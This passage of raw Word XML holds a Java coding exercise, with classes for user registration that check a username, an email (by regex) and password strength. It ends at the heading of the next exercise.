          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073451D1" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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User</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user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passwor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emai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D3375D8" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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user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username</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3CE524" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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passwor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assword</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2F71B7" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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email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mail</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302A58F1" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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3A2D8C2" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7962880E" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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getUser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40A6B69" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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username</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC76B65" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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36FC9C6" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629C80BA" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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getPasswor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9034A92" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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password</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E508533" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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212DE46" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6213C" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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getEmai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F95D3BD" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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email</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E8C471" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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0FEF85A" w14:textId="4A2AE078" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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53602A1A" w14:textId="2AAC2D86" w:rsidR="009667C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00044340" w:rsidP="009667C9">
      <w:pPr>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color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>UserRegistration Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627BDE40"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gex</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450A1FA2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306C5049"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UserRegistrati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650D078"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255A5E2B"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Validator for username (non-empty)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB518B"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isUsernameValid</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user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6D404A1"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user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amp;&amp;</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ser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ri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Empty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC28B1A"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85F2C9A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063EE6B7"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Validator for email using regex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3625BAFF"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isEmailValid</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emai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0838B2C"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emailRegex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zA-Z0-9_+&amp;*-]+(?:\\.[a-zA-Z0-9_+&amp;*-]+)*@(?:[a-zA-Z0-9-]+\\.)+[a-zA-Z]{2,7}$"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317EFC37"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attern</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> patter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atter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mpil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mailRegex</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E8CAA"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tcher</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> match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atter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tch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mail</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308748ED"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match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tches</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5105669E"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73E8FEB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16240004"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Validator for password (minimum 8 characters, at least one uppercase, one lowercase, and one number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E216487"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isPasswordValid</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passwor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21A8F65"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asswor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8</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FFBF560"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70013BFD"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A674A20"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hasUpp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hasLow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hasDigi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67939925"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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> c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asswor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CharArra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4671375"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harac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UpperCas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hasUpp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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21624260"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harac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LowerCas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hasLow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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519932AB"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harac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Digi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hasDigi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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D39A322"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7344777"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hasUpper </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hasLower </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hasDigit</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA65A4D"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7E30D0B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C784D5E"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Register user if all details are valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3CD7FA"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registerUser</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user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passwor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emai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F3680F1"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UsernameVali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ser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8FD5F69"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Username is invalid."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B423263"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0593C162"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06E6FAC"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EmailVali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mai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7BECD42"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Email format is invalid."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD54A85"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2A98BFBD"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1006D08"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PasswordVali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asswor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863AEA9"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assword must be at least 8 characters long and contain an uppercase letter, a lowercase letter, and a number."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333072AB"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64ABEBD3"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282F876"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6582958A"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imulate saving the user (for example, add to a database or list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAFC4B2"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User</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> us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Us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ser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asswor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mail</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B19BA47"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User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user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registered successfully!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650C18EC"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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C24FB7D"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F1CF2E8" w14:textId="6C3EB955"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6BE558B4" w14:textId="10C1E173" w:rsidR="009667C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00044340" w:rsidP="009667C9">
      <w:pPr>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color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Main Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7807D8"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canner</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D1AEEE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C30A28C"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i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0D8B6A5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E38D11"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8A796B3"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canner</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> scann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canner</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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D1C7A"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UserRegistration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> userRegistratio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UserRegistration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594A7126"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E3B053"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Get user details from input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F01AC0"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Enter username: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3EECDF"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user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cann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extLine</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B121EE6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41382902"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Enter password: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228A0832"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passwor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cann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extLine</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2469312B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729011A4"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Enter email: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C01A44F"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email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cann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extLine</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06093B8D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3E4353"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Register the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA99C59"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isRegistere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userRegistra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gisterUs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ser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asswor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mail</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDFC9F7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7353D514"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Registere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22263FD"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Registration successful!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C62C757"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ls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48613C5"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Registration failed. Please try again."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B14B21"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A9BED4E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEBABA5"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xml:space="preserve">        scann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lose</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E249868" w14:textId="77777777"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308FA64" w14:textId="24766126" w:rsidR="00044340" w:rsidRPr="00CE4B95"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11BA535D" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95" w:rsidRDefault="009667C9" w:rsidP="009667C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E5588F" w14:textId="4366B7B2" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="379" w:name="_Toc196307859"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00F03300" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Write a method to register and check the available user in repo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="379"/>
    </w:p>
    <w:p w14:paraId="0EC567F4" w14:textId="41333A4B" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B2544B"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w:t>
      </w:r>
    </w:p>
